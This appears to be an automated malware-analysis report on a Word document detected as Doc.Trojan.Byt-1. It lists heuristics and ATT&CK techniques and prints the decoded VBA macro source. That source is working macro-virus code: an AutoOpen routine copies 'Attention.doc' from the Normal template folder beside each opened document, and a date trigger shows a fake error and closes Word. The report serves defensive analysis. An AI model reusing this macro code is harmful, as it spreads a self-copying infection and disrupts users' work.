MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is designed to execute automatically when the document is opened. This macro attempts to copy a file named '\Attention.doc' to the active document's directory. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further indicate malicious intent, likely for delivering a secondary payload.
Heuristics 4
-
ClamAV: Doc.Trojan.Byt-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Byt-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1568 bytes |
SHA-256: 1893b6462d5aecc938624e8bbee17b85f11bae96dff5b2aa2e3a80e6e35a4800 |
|||
|
Detection
ClamAV:
Doc.Trojan.Byt-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Autoexec"
Option Explicit
Private Declare Function _
FindWindow _
Lib "user32" _
Alias "FindWindowA" _
(ByVal lpClassName As String, _
ByVal lpWindowName As String) _
As Long
Private Declare Function _
SendMessage _
Lib "user32" _
Alias "SendMessageA" _
(ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
lParam As Any) _
As Long
Public Const FILENAME As String = "\Attention.doc"
Sub Main()
If Day(Now) = 13 Then
MsgBox "Программа выполнила недопустимую операцию " & _
"и должна быть закрыта", vbCritical + vbOKOnly, "Microsoft Word"
CloseWinWord
End If
End Sub
Private Sub CloseWinWord()
Dim lngWinWord As Long
lngWinWord = FindWindow(vbNullString, "Microsoft Word")
SendMessage lngWinWord, 16, 0, 0
End Sub
Public Sub LegalCopy(Source As String, Destination As String)
On Error Resume Next
Kill Destination
Dim bytDocument() As Byte
ReDim bytDocument(1 To FileLen(Source))
Open Source For Binary As #1
Get #1, , bytDocument()
Close #1
Open Destination For Binary As #1
Put #1, , bytDocument()
Close #1
End Sub
Attribute VB_Name = "Autoopen"
Option Explicit
Sub Main()
LegalCopy NormalTemplate.Path & FILENAME, _
ActiveDocument.Path & FILENAME
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.